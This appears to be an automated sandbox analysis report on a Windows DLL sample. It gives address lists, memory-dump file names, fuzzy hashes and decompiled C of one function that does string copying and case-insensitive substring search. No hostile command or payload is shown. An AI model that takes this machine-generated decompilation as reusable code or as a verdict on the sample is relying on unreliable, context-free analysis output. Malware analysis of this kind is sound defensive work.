0x6e7a2cab
0x6e7a2caf
0x6e7a2cb1
0x00000000
0x00000000
0x6e7a2cb3
0x6e7a2cb7
0x6e7a2cba
0x6e7a2cbc
0x00000000
0x00000000
0x00000000
0x6e7a2cbc
0x6e7a2cbe
0x00000000
0x6e7a2cbe
0x6e7a2c91
0x6e7a2c48
0x00000000
0x6e7a2c48
0x6e7a2bd1
0x6e7a2bd5
0x6e7a2bd5
0x6e7a2bd8
0x6e7a2bec
0x6e7a2bf8
0x6e7a2bf8
0x6e7a2bfe
0x6e7a2bfe
0x6e7a2c03
0x6e7a2c07
0x6e7a2c0b
0x6e7a2c0d
0x00000000
0x00000000
0x6e7a2c13
0x6e7a2c16
0x6e7a2c18
0x00000000
0x00000000
0x6e7a2c1a
0x6e7a2c20
0x6e7a2c31
0x6e7a2c31
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a2c22
0x6e7a2c22
0x6e7a2c22
0x6e7a2c26
0x00000000
0x00000000
0x6e7a2c28
0x6e7a2c29
0x6e7a2c2f
0x00000000
0x00000000
0x00000000
0x6e7a2c2f
0x00000000
0x6e7a2c22
0x6e7a2d69
0x6e7a2d6c
0x00000000
0x6e7a2d6c
0x6e7a2bdc
0x6e7a2bde
0x6e7a2bde
0x6e7a2be1
0x6e7a2be1
0x6e7a2be5
0x00000000
0x00000000
0x6e7a2be7
0x6e7a2be8
0x6e7a2bea
0x00000000
0x00000000
0x00000000
0x6e7a2bea
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a2b87
0x6e7a2b87
0x6e7a2b87
0x6e7a2b8b
0x00000000
0x00000000
0x6e7a2b8d
0x6e7a2b8e
0x6e7a2b94
0x00000000
0x00000000
0x00000000
0x6e7a2b94
0x00000000
0x6e7a2b87
0x6e7a2d73
0x6e7a2d76
0x00000000
0x6e7a2d76
0x6e7a2b41
0x6e7a2b43
0x6e7a2b43
0x6e7a2b46
0x6e7a2b46
0x6e7a2b4a
0x00000000
0x00000000
0x6e7a2b4c
0x6e7a2b4d
0x6e7a2b4f
0x00000000
0x00000000
0x00000000
0x6e7a2b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a2b24
0x6e7a2b24
0x6e7a2b24
0x6e7a2b28
0x00000000
0x00000000
0x6e7a2b2a
0x6e7a2b2b
0x6e7a2b31
0x00000000
0x00000000
0x00000000
0x6e7a2b31
0x00000000
0x6e7a2b24
0x6e7a2d7d
0x6e7a2d80
0x00000000
0x6e7a2d80
0x6e7a2adf
0x6e7a2ae1
0x6e7a2ae1
0x6e7a2ae3
0x6e7a2ae3
0x6e7a2ae7
0x00000000
0x00000000
0x6e7a2ae9
0x6e7a2aea
0x6e7a2aec
0x00000000
0x00000000
0x00000000
0x6e7a2aec
0x00000000
0x6e7a2ae3
0x6e7a2ac0
0x6e7a2ac1
0x6e7a2ac5
0x00000000
0x00000000
0x00000000
0x6e7a2ac5
0x6e7a2d87
0x6e7a2d8b
0x6e7a2d8f
0x6e7a2d95
0x6e7a2d95
0x6e7a2d96
0x00000000
0x00000000
0x6e7a2d9c
0x6e7a2da5
0x6e7a2daa
0x6e7a2dad
0x6e7a2db1
0x00000000
0x00000000
0x6e7a2db7
0x6e7a2dbb
0x6e7a2dbf
0x6e7a2dbf
0x6e7a2dc0
0x6e7a2dc1
0x6e7a2dcb
0x6e7a2dd1
0x6e7a2dd4
0x6e7a2dd6
0x00000000
0x00000000
0x6e7a2dd8
0x6e7a2ddb
0x00000000
0x00000000
0x00000000
0x6e7a2ddd
0x00000000
0x6e7a2dbf
0x6e7a2a50
0x6e7a2a54
0x6e7a2a54
0x6e7a2a58
0x00000000
0x00000000
0x6e7a2a5e
0x6e7a2a5f
0x6e7a2a65
0x00000000
0x00000000
0x6e7a2a67
0x00000000
0x6e7a2a67
0x6e7a2de2
0x6e7a2de2
0x6e7a2de6
0x6e7a2de6
0x6e7a2de8
0x00000000
0x00000000
0x6e7a2dee
0x00000000
0x00000000
0x6e7a2df4
0x6e7a2df8
0x00000000
0x6e7a2df8
0x6e7a2e01
0x6e7a2e04
0x6e7a2e08
0x6e7a2e0a
0x00000000
0x6e7a2e0a
0x6e7a29ef
0x6e7a29f3
0x6e7a29f5
0x6e7a29f5
0x6e7a29f7
0x6e7a29f7
0x6e7a29fb
0x00000000
0x00000000
0x6e7a2a01
0x6e7a2a02
0x6e7a2a04
0x00000000
0x00000000
0x6e7a2a06
0x00000000
0x6e7a2a06
0x00000000
0x6e7a2e10
0x6e7a2e10
0x6e7a2e14
0x6e7a2e18
0x6e7a2e18
0x00000000
0x6e7a2e20
0x00000000
0x6e7a287e
0x6e7a2807
0x6e7a280a
0x6e7a280c
0x6e7a280e
0x00000000
0x00000000
0x6e7a2810
0x6e7a2814
0x6e7a2814
0x6e7a2816
0x6e7a281a
0x6e7a281d
0x6e7a281d
0x6e7a281e
0x6e7a2823
0x6e7a2827
0x6e7a2829
0x00000000
0x00000000
0x6e7a282b
0x6e7a282f
0x6e7a2832
0x6e7a2834
0x00000000
0x00000000
0x00000000
0x6e7a2834
0x6e7a2836
0x6e7a283a
0x6e7a283e
0x00000000
0x6e7a283e
0x6e7a2801
0x6e7a27bf
0x00000000
0x6e7a27bf
0x6e7a273b
0x6e7a273b
0x6e7a273e
0x6e7a2756
0x6e7a275a
0x6e7a2766
0x6e7a2766
0x6e7a276c
0x6e7a276c
0x6e7a2771
0x6e7a2775
0x6e7a2779
0x6e7a277b
0x00000000
0x00000000
0x6e7a2781
0x6e7a2784
0x6e7a2786
0x00000000
0x00000000
0x6e7a2788
0x6e7a278e
0x6e7a27a3
0x6e7a27a3
0x6e7a27a8
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a2790
0x6e7a2790
0x6e7a2790
0x6e7a2794
0x00000000
0x00000000
0x6e7a279a
0x6e7a279b
0x6e7a27a1
0x00000000
0x00000000
0x00000000
0x6e7a27a1
0x6e7a2e25
0x6e7a2e25
0x6e7a2e28
0x6e7a2e36
0x6e7a2e2a
0x6e7a2e2a
0x6e7a2e2d
0x6e7a2e2d
0x00000000
0x6e7a2e28
0x6e7a2e40
0x6e7a2e43
0x00000000
0x6e7a2e43
0x6e7a2742
0x6e7a2744
0x6e7a2744
0x6e7a2747
0x6e7a2747
0x6e7a274b
0x00000000
0x00000000
0x6e7a2751
0x6e7a2752
0x6e7a2754
0x00000000
0x00000000
0x00000000
0x6e7a2754
0x00000000
0x6e7a2747
0x6e7a2728
0x00000000
0x6e7a2728
0x6e7a26de
0x6e7a2704
0x6e7a2704
0x6e7a2706
0x6e7a2707
0x6e7a270c
0x00000000
0x6e7a270c
0x6e7a26e0
0x6e7a26e3
0x6e7a26e7
0x00000000
0x00000000
0x6e7a26e9
0x6e7a26eb
0x6e7a26eb
0x6e7a26ec
0x6e7a26f1
0x6e7a26f7
0x00000000
0x00000000
0x6e7a26f9
0x6e7a26fd
0x6e7a2702
0x00000000
0x00000000
0x00000000
0x6e7a2702
0x00000000

Strings

@, xrefs: 6E7A2718

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 933df8fe11205ce58da33e9f299d6ed847c0e435b40f8ebfae3a0afc1ac406fd
Instruction ID: 0d9de5e4475b1dfc00e86874b3654c8f401370a225f7472149e5c5d415b2ef35
Opcode Fuzzy Hash: 933df8fe11205ce58da33e9f299d6ed847c0e435b40f8ebfae3a0afc1ac406fd
Instruction Fuzzy Hash: 77326C70A0C3D34BD715CEAEC59032A7BE66FC1310F19877DEAA55B2B6DA34C9418782

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A1730, Relevance: 1.9, Strings: 1, Instructions: 649
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E6E7A1730(unsigned int __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				char* _t181;
				signed int _t182;
				signed int* _t188;
				signed int _t192;
				signed int* _t193;
				signed int _t198;
				signed int _t202;
				signed int _t205;
				void* _t206;
				signed int _t211;
				signed int _t214;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				signed int _t236;
				signed int _t237;
				signed int _t240;
				signed int _t241;
				signed int _t244;
				signed int _t245;
				signed int _t251;
				signed int _t252;
				signed int _t258;
				signed int _t260;
				signed int _t261;
				char _t262;
				char _t263;
				signed int _t264;
				signed int _t265;
				void* _t268;
				signed int _t270;
				char _t272;
				unsigned int _t275;
				signed int _t276;
				signed int _t279;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t294;
				intOrPtr* _t295;
				void* _t296;
				signed int _t297;
				intOrPtr* _t298;
				signed int _t299;
				signed int _t300;
				void* _t301;
				signed int _t303;
				signed int _t309;
				signed int _t312;
				signed int _t314;
				signed int _t320;
				signed int _t321;
				signed int _t323;
				signed int _t324;
				void* _t325;
				signed int _t326;
				signed int _t327;
				signed int _t330;
				signed int* _t331;
				void* _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t339;
				intOrPtr* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t347;
				char _t349;
				char _t350;
				char _t351;
				unsigned int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t360;
				signed int _t361;
				signed int _t363;
				unsigned int _t368;
				signed int _t370;
				signed int _t372;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				signed int _t382;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				void* _t391;

				_v56 = 0;
				_t353 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t363 = E6E791030();
				_t391 = (_t388 & 0xfffffff0) - 0x34 + 4;
				_t181 = _v56;
				if(_t181 == 0) {
					 *_t363 = 0;
					L8:
					_t182 = _a8;
					_v52 = 0x40;
					_v56 = _t363;
					if(_t182 != 0) {
						__eflags = _t363;
						if(_t363 == 0) {
							_t260 = 0x40;
							_t240 = 0;
							L22:
							_t20 = _t240 + 2; // 0x80000001
							_t289 = _t20;
							__eflags = _t289 - 0x40;
							_t290 =  <=  ? 0x40 : _t289;
							__eflags = _t260 - _t290;
							if(_t260 < _t290) {
								_t368 = (_t290 >> 5 >> 0x1a) + _t290 >> 6;
								_t291 = _t290 & 0x8000003f;
								__eflags = _t291;
								if(_t291 < 0) {
									_t291 = (_t291 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t291;
								}
								__eflags = _t291;
								_t370 = _t368 + (0 | _t291 > 0x00000000) << 6;
								_push(_t370);
								_t261 = E6E791030();
								_t391 = _t391 + 4;
								_t292 = _v56;
								__eflags = _t292;
								if(_t292 == 0) {
									 *_t261 = 0;
									goto L35;
								} else {
									__eflags = _t261;
									if(_t261 == 0) {
										L33:
										_push(1);
										_push(_t292);
										_v68 = _t261;
										E6E7910B0();
										_t261 = _v68;
										_t391 = _t391 + 8;
										L35:
										_v52 = _t370;
										_v56 = _t261;
										L36:
										 *((char*)(_t261 + _t240)) = _a8;
										_t188 =  &_v56;
										 *((char*)(_t240 +  *_t188 + 1)) = 0;
										L37:
										_t294 =  *_t188;
										if(_t294 == 0) {
											L39:
											_t295 = _a4;
											_push(0x40);
											 *_t295 = 0;
											 *((intOrPtr*)(_t295 + 4)) = 0;
											_t241 = E6E791030();
											_t391 = _t391 + 4;
											_t192 =  *_a4;
											if(_t192 == 0) {
												 *_t241 = 0;
												L60:
												_t193 = _a4;
												 *_t193 = _t241;
												_t193[1] = 0x40;
												L61:
												_push(1);
												_push(_v56);
												E6E7910B0();
												_v56 = 0;
												_v52 = 0;
												return _a4;
											}
											if(_t241 == 0) {
												L45:
												_push(1);
												_push(_t192);
												E6E7910B0();
												_t391 = _t391 + 8;
												goto L60;
											}
											_t296 =  *_t192;
											 *_t241 = _t296;
											if(_t296 == 0) {
												goto L45;
											}
											_t297 = 0;
											while(1) {
												_t297 = _t297 + 1;
												_t262 =  *((char*)(_t192 + _t297 * 2 - 1));
												 *((char*)(_t241 + _t297 * 2 - 1)) = _t262;
												if(_t262 == 0) {
													goto L45;
												}
												_t263 =  *((char*)(_t192 + _t297 * 2));
												 *((char*)(_t241 + _t297 * 2)) = _t263;
												if(_t263 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t198 =  *_t294;
										if(_t198 != 0) {
											_t355 =  *_t353;
											__eflags = _t355;
											if(_t355 == 0) {
												L52:
												_t298 = _a4;
												_push(0x40);
												 *_t298 = 0;
												 *((intOrPtr*)(_t298 + 4)) = 0;
												_t241 = E6E791030();
												_t391 = _t391 + 4;
												_t202 =  *_a4;
												__eflags = _t202;
												if(_t202 == 0) {
													 *_t241 = 0;
													goto L60;
												}
												__eflags = _t241;
												if(_t241 == 0) {
													L58:
													_push(1);
													_push(_t202);
													E6E7910B0();
													_t391 = _t391 + 8;
													goto L60;
												}
												_t299 =  *_t202;
												 *_t241 = _t299;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L58;
												}
												_t300 = 0;
												__eflags = 0;
												while(1) {
													_t300 = _t300 + 1;
													_t264 =  *((char*)(_t202 + _t300 * 2 - 1));
													 *(_t241 + _t300 * 2 - 1) = _t264;
													__eflags = _t264;
													if(_t264 == 0) {
														goto L58;
													}
													_t265 =  *((char*)(_t202 + _t300 * 2));
													 *(_t241 + _t300 * 2) = _t265;
													__eflags = _t265;
													if(_t265 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t355;
											if( *_t355 == 0) {
												goto L52;
											}
											_v48 = _t198;
											_t372 = _t198 - 0x41;
											__eflags = _t372 - 0x19;
											_v64 = _t372;
											_t267 =  >  ? _t198 : _t198 + 0x20;
											_t243 =  >  ? _t198 : _t198 + 0x20;
											_t268 = 0;
											__eflags = 0;
											_v68 =  >  ? _t198 : _t198 + 0x20;
											_v36 = _t294;
											_t244 = _t355;
											while(1) {
												_t301 =  *_t244;
												__eflags = _t301 - 0x41 - 0x19;
												_t302 =  <=  ? _t301 + 0x20 : _t301;
												__eflags = ( <=  ? _t301 + 0x20 : _t301) - _v68;
												if(( <=  ? _t301 + 0x20 : _t301) == _v68) {
													break;
												}
												_t268 = _t268 + 1;
												_t244 = _t244 + 1;
												__eflags =  *((char*)(_t268 + _t355));
												if( *((char*)(_t268 + _t355)) != 0) {
													continue;
												}
												goto L52;
											}
											_t205 = _v48;
											_t303 = _v36;
											__eflags = _t244;
											if(_t244 == 0) {
												goto L52;
											}
											_t270 = _t303 & 0x0000000f;
											_v44 = _t205 + 0x20;
											asm("pxor xmm0, xmm0");
											_v40 = _t355;
											_t377 =  ~_t270 + 0x10;
											__eflags = _t377;
											_v48 = _t205;
											_v36 = _t303;
											do {
												_t356 = _t270;
												__eflags = _t270;
												if(_t270 == 0) {
													L69:
													_v32 = _t377;
													_t309 =  ~( ~_t356 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t309;
													_t378 = _v36;
													while(1) {
														asm("movdqu xmm1, [esi+edi]");
														asm("pcmpeqb xmm1, xmm0");
														asm("pmovmskb eax, xmm1");
														__eflags = _t205;
														if(_t205 != 0) {
															break;
														}
														_t356 = _t356 + 0x10;
														__eflags = _t356 - _t309;
														if(_t356 < _t309) {
															continue;
														}
														_v36 = _t378;
														_t379 = _v32;
														__eflags = _t309 - 0x7fffffff;
														if(_t309 >= 0x7fffffff) {
															L77:
															_t309 = 0x7fffffff;
															L78:
															_v60 = _t309;
															_t206 = 0;
															__eflags = 0;
															_v68 = _t270;
															_v32 = _t379;
															while(1) {
																_t310 =  *((char*)(_t206 + _t244));
																_t272 =  *((char*)(_t206 + _v36));
																_t110 = _t310 - 0x61; // 0x7fffff9e
																__eflags = _t110 - 0x19;
																_t111 = _t310 - 0x20; // 0x7fffffdf
																_t311 =  <=  ? _t111 :  *((char*)(_t206 + _t244));
																__eflags = _t272 - 0x61 - 0x19;
																_t312 =  <=  ? _t111 :  *((char*)(_t206 + _t244));
																_t273 =  <=  ? _t272 - 0x20 : _t272;
																_t274 =  <=  ? _t272 - 0x20 : _t272;
																__eflags = _t312 - ( <=  ? _t272 - 0x20 : _t272);
																if(__eflags < 0 || __eflags > 0) {
																	break;
																}
																__eflags = _t312;
																if(_t312 == 0) {
																	L83:
																	_t360 = _v40;
																	__eflags = _t244;
																	if(_t244 == 0) {
																		goto L52;
																	}
																	_t245 = _t244 - _t360;
																	__eflags = _t245;
																	if(_t245 != 0) {
																		_t279 = _t360 & 0x0000000f;
																		__eflags = _t279;
																		if(_t279 == 0) {
																			L97:
																			_t320 =  ~( ~_t279 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																			__eflags = _t320;
																			while(1) {
																				asm("movdqu xmm1, [edi+ecx]");
																				asm("pcmpeqb xmm1, xmm0");
																				asm("pmovmskb eax, xmm1");
																				__eflags = _t205;
																				if(_t205 != 0) {
																					break;
																				}
																				_t279 = _t279 + 0x10;
																				__eflags = _t279 - _t320;
																				if(_t279 < _t320) {
																					continue;
																				}
																				__eflags = _t320 - 0x7fffffff;
																				if(_t320 >= 0x7fffffff) {
																					L103:
																					_t320 = 0x7fffffff;
																					L104:
																					_t211 = _t320 >> 0x0000001f & _t320;
																					_t321 = _t320 - _t211;
																					__eflags = _t245;
																					if(_t245 < 0) {
																						L106:
																						_t245 = _t321;
																						L107:
																						_t280 = _a4;
																						 *_t280 = 0;
																						 *((intOrPtr*)(_t280 + 4)) = 0;
																						_t386 = _t211 + _t360;
																						__eflags = _t386;
																						_v64 = _t386;
																						if(_t386 == 0) {
																							L141:
																							_push(0x40);
																							_t241 = E6E791030();
																							_t391 = _t391 + 4;
																							_t214 =  *_a4;
																							__eflags = _t214;
																							if(_t214 == 0) {
																								 *_t241 = 0;
																								goto L60;
																							}
																							__eflags = _t241;
																							if(_t241 == 0) {
																								L147:
																								_push(1);
																								_push(_t214);
																								E6E7910B0();
																								_t391 = _t391 + 8;
																								goto L60;
																							}
																							_t323 =  *_t214;
																							 *_t241 = _t323;
																							__eflags = _t323;
																							if(_t323 == 0) {
																								goto L147;
																							}
																							_t324 = 0;
																							__eflags = 0;
																							while(1) {
																								_t324 = _t324 + 1;
																								_t281 =  *((char*)(_t214 + _t324 * 2 - 1));
																								 *(_t241 + _t324 * 2 - 1) = _t281;
																								__eflags = _t281;
																								if(_t281 == 0) {
																									goto L147;
																								}
																								_t282 =  *((char*)(_t214 + _t324 * 2));
																								 *(_t241 + _t324 * 2) = _t282;
																								__eflags = _t282;
																								if(_t282 != 0) {
																									continue;
																								}
																								goto L147;
																							}
																							goto L147;
																						}
																						__eflags =  *(_t360 + _t211);
																						if( *(_t360 + _t211) == 0) {
																							goto L141;
																						}
																						__eflags = _t245;
																						if(_t245 != 0) {
																							L121:
																							_t137 = _t245 + 1; // 0x80000000
																							_t325 = _t137;
																							__eflags = _t325 - 0x40;
																							_t326 =  <=  ? 0x40 : _t325;
																							__eflags = _t326;
																							if(_t326 > 0) {
																								_v68 = (_t326 >> 5 >> 0x1a) + _t326 >> 6;
																								_t327 = _t326 & 0x8000003f;
																								__eflags = _t327;
																								if(_t327 < 0) {
																									_t327 = (_t327 - 0x00000001 | 0xffffffc0) + 1;
																									__eflags = _t327;
																								}
																								__eflags = _t327;
																								_t330 = _v68 + (0 | _t327 > 0x00000000) << 6;
																								_v68 = _t330;
																								_push(_t330);
																								_t387 = E6E791030();
																								_t391 = _t391 + 4;
																								_t226 =  *_a4;
																								__eflags = _t226;
																								if(_t226 == 0) {
																									 *_t387 = 0;
																									goto L133;
																								} else {
																									__eflags = _t387;
																									if(_t387 == 0) {
																										L131:
																										_push(1);
																										_push(_t226);
																										E6E7910B0();
																										_t391 = _t391 + 8;
																										L133:
																										_t331 = _a4;
																										_t331[1] = _v68;
																										 *_t331 = _t387;
																										L134:
																										__eflags = _t387;
																										if(_t387 == 0) {
																											goto L61;
																										}
																										_t283 = _v64;
																										_t332 = 0;
																										while(1) {
																											_t228 =  *_t283;
																											_t332 = _t332 + 1;
																											 *_t387 = _t228;
																											__eflags = _t245;
																											if(_t245 == 0) {
																												goto L139;
																											}
																											__eflags = _t332 - _t245;
																											if(_t332 == _t245) {
																												 *(_t387 + 1) = 0;
																												goto L61;
																											}
																											L139:
																											__eflags = _t228;
																											if(_t228 == 0) {
																												goto L61;
																											}
																											_t387 = _t387 + 1;
																											_t283 = _t283 + 1;
																											__eflags = _t283;
																										}
																									}
																									_t333 =  *_t226;
																									 *_t387 = _t333;
																									__eflags = _t333;
																									if(_t333 == 0) {
																										goto L131;
																									}
																									_t284 = 0;
																									__eflags = 0;
																									while(1) {
																										_t284 = _t284 + 1;
																										_t334 =  *((char*)(_t226 + _t284 * 2 - 1));
																										 *(_t387 + _t284 * 2 - 1) = _t334;
																										__eflags = _t334;
																										if(_t334 == 0) {
																											goto L131;
																										}
																										_t335 =  *((char*)(_t226 + _t284 * 2));
																										 *(_t387 + _t284 * 2) = _t335;
																										__eflags = _t335;
																										if(_t335 != 0) {
																											continue;
																										}
																										goto L131;
																									}
																									goto L131;
																								}
																							}
																							_t387 = 0;
																							goto L134;
																						}
																						_t361 = _t360 + _t211;
																						_t339 = _t361 & 0x0000000f;
																						__eflags = _t339;
																						if(_t339 == 0) {
																							L114:
																							_t245 =  ~( ~_t339 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																							__eflags = _t245;
																							while(1) {
																								asm("movdqu xmm1, [edi+edx]");
																								asm("pcmpeqb xmm1, xmm0");
																								asm("pmovmskb eax, xmm1");
																								__eflags = _t211;
																								if(_t211 != 0) {
																									break;
																								}
																								_t339 = _t339 + 0x10;
																								__eflags = _t339 - _t245;
																								if(_t339 < _t245) {
																									continue;
																								}
																								__eflags = _t245 - 0x7fffffff;
																								if(_t245 >= 0x7fffffff) {
																									L120:
																									_t245 = 0x7fffffff;
																									goto L121;
																								} else {
																									goto L118;
																								}
																								while(1) {
																									L118:
																									__eflags =  *((char*)(_t245 + _t361));
																									if( *((char*)(_t245 + _t361)) == 0) {
																										goto L121;
																									}
																									_t245 = _t245 + 1;
																									__eflags = _t245 - 0x7fffffff;
																									if(_t245 < 0x7fffffff) {
																										continue;
																									}
																									goto L120;
																								}
																								goto L121;
																							}
																							asm("bsf ebx, eax");
																							_t245 = _t245 + _t339;
																							goto L121;
																						}
																						_t245 = 0;
																						_t339 =  ~_t339 + 0x10;
																						__eflags = _t339;
																						while(1) {
																							__eflags =  *((char*)(_t245 + _t361));
																							if( *((char*)(_t245 + _t361)) == 0) {
																								goto L121;
																							}
																							_t245 = _t245 + 1;
																							__eflags = _t245 - _t339;
																							if(_t245 < _t339) {
																								continue;
																							}
																							goto L114;
																						}
																						goto L121;
																					}
																					__eflags = _t245 - _t321;
																					if(_t245 <= _t321) {
																						goto L107;
																					}
																					goto L106;
																				} else {
																					goto L101;
																				}
																				while(1) {
																					L101:
																					__eflags =  *((char*)(_t320 + _t360));
																					if( *((char*)(_t320 + _t360)) == 0) {
																						goto L104;
																					}
																					_t320 = _t320 + 1;
																					__eflags = _t320 - 0x7fffffff;
																					if(_t320 < 0x7fffffff) {
																						continue;
																					}
																					goto L103;
																				}
																				goto L104;
																			}
																			asm("bsf edx, eax");
																			_t320 = _t320 + _t279;
																			goto L104;
																		}
																		_t320 = 0;
																		_t279 =  ~_t279 + 0x10;
																		__eflags = _t279;
																		while(1) {
																			__eflags =  *((char*)(_t320 + _t360));
																			if( *((char*)(_t320 + _t360)) == 0) {
																				goto L104;
																			}
																			_t320 = _t320 + 1;
																			__eflags = _t320 - _t279;
																			if(_t320 < _t279) {
																				continue;
																			}
																			goto L97;
																		}
																		goto L104;
																	}
																	_t341 = _a4;
																	_push(0x40);
																	 *_t341 = 0;
																	 *((intOrPtr*)(_t341 + 4)) = 0;
																	_t241 = E6E791030();
																	_t391 = _t391 + 4;
																	_t233 =  *_a4;
																	__eflags = _t233;
																	if(_t233 == 0) {
																		 *_t241 = 0;
																		goto L60;
																	}
																	__eflags = _t241;
																	if(_t241 == 0) {
																		L91:
																		_push(1);
																		_push(_t233);
																		E6E7910B0();
																		_t391 = _t391 + 8;
																		goto L60;
																	}
																	_t342 =  *_t233;
																	 *_t241 = _t342;
																	__eflags = _t342;
																	if(_t342 == 0) {
																		goto L91;
																	}
																	_t343 = 0;
																	__eflags = 0;
																	while(1) {
																		_t343 = _t343 + 1;
																		_t286 =  *((char*)(_t233 + _t343 * 2 - 1));
																		 *(_t241 + _t343 * 2 - 1) = _t286;
																		__eflags = _t286;
																		if(_t286 == 0) {
																			goto L91;
																		}
																		_t287 =  *((char*)(_t233 + _t343 * 2));
																		 *(_t241 + _t343 * 2) = _t287;
																		__eflags = _t287;
																		if(_t287 != 0) {
																			continue;
																		}
																		goto L91;
																	}
																	goto L91;
																}
																_t206 = _t206 + 1;
																__eflags = _t206 - _v60;
																if(_t206 < _v60) {
																	continue;
																}
																goto L83;
															}
															_t275 = _v68;
															_t382 = _v32;
															_t314 = _t244 + 1;
															__eflags = _t314;
															if(_t314 == 0) {
																goto L52;
															}
															__eflags = _v64 - 0x19;
															_t208 =  <=  ? _v44 : _v48;
															_t205 =  <=  ? _v44 : _v48;
															__eflags =  *(_t244 + 1);
															if( *(_t244 + 1) == 0) {
																goto L52;
															}
															_v68 = _t275;
															_v32 = _t382;
															while(1) {
																_t244 = _t244 + 1;
																_t314 = _t314 + 1;
																_t276 =  *_t244 & 0x000000ff;
																__eflags =  *((char*)(_t314 - 1)) + 0xffffffbf - 0x19;
																_t277 =  <=  ? _t276 + 0x20 : _t276;
																__eflags = ( <=  ? _t276 + 0x20 : _t276) - _t205;
																if(( <=  ? _t276 + 0x20 : _t276) == _t205) {
																	goto L163;
																}
																__eflags =  *_t314;
																if( *_t314 != 0) {
																	continue;
																}
																goto L52;
															}
															goto L163;
														}
														_t205 = _v36;
														while(1) {
															__eflags =  *((char*)(_t309 + _t205));
															if( *((char*)(_t309 + _t205)) == 0) {
																break;
															}
															_t309 = _t309 + 1;
															__eflags = _t309 - 0x7fffffff;
															if(_t309 < 0x7fffffff) {
																continue;
															}
															_v36 = _t205;
															goto L77;
														}
														L158:
														_v36 = _t205;
														L159:
														__eflags = _t309;
														if(__eflags == 0) {
															goto L77;
														}
														if(__eflags > 0) {
															goto L78;
														}
														goto L83;
													}
													asm("bsf edx, eax");
													_v36 = _t378;
													_t309 = _t309 + _t356;
													_t379 = _v32;
													goto L159;
												}
												_t205 = _v36;
												_t356 = _t377;
												_t309 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t309 + _t205));
													if( *((char*)(_t309 + _t205)) == 0) {
														goto L158;
													}
													_t309 = _t309 + 1;
													__eflags = _t309 - _t377;
													if(_t309 < _t377) {
														continue;
													}
													_v36 = _t205;
													goto L69;
												}
												goto L158;
												L163:
												_t270 = _v68;
												_t377 = _v32;
												__eflags = _t244;
											} while (_t244 != 0);
											goto L52;
										}
										goto L39;
									}
									_t236 =  *_t292;
									 *_t261 = _t236;
									__eflags = _t236;
									if(_t236 == 0) {
										goto L33;
									}
									_v60 = _t370;
									_t237 = 0;
									__eflags = 0;
									_v64 = _t240;
									_v68 = _t353;
									while(1) {
										_t237 = _t237 + 1;
										_t251 =  *((char*)(_t292 + _t237 * 2 - 1));
										 *(_t261 + _t237 * 2 - 1) = _t251;
										__eflags = _t251;
										if(_t251 == 0) {
											break;
										}
										_t252 =  *((char*)(_t292 + _t237 * 2));
										 *(_t261 + _t237 * 2) = _t252;
										__eflags = _t252;
										if(_t252 != 0) {
											continue;
										}
										break;
									}
									_t370 = _v60;
									_t240 = _v64;
									_t353 = _v68;
									goto L33;
								}
							}
							_t261 = _v56;
							goto L36;
						}
						_t347 = _t363 & 0x0000000f;
						__eflags = _t347;
						if(_t347 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t258 =  ~( ~_t347 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t258;
							while(1) {
								asm("movdqu xmm1, [esi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t182;
								if(_t182 != 0) {
									break;
								}
								_t347 = _t347 + 0x10;
								__eflags = _t347 - _t258;
								if(_t347 < _t258) {
									continue;
								}
								__eflags = _t258 - 0x7fffffff;
								if(_t258 >= 0x7fffffff) {
									L21:
									_t260 = 0x40;
									_t240 = 0x7fffffff;
									goto L22;
								} else {
									goto L19;
								}
								while(1) {
									L19:
									__eflags =  *((char*)(_t258 + _t363));
									if( *((char*)(_t258 + _t363)) == 0) {
										break;
									}
									_t258 = _t258 + 1;
									__eflags = _t258 - 0x7fffffff;
									if(_t258 < 0x7fffffff) {
										continue;
									}
									goto L21;
								}
								L165:
								__eflags = _t240 - 0xfffffffe;
								if(_t240 != 0xfffffffe) {
									_t260 = 0x40;
								} else {
									 *_t363 = 0;
									_t260 = _v52;
								}
								goto L22;
							}
							asm("bsf ebx, eax");
							_t240 = _t258 + _t347;
							goto L165;
						}
						_t240 = 0;
						_t347 =  ~_t347 + 0x10;
						__eflags = _t347;
						while(1) {
							__eflags =  *((char*)(_t240 + _t363));
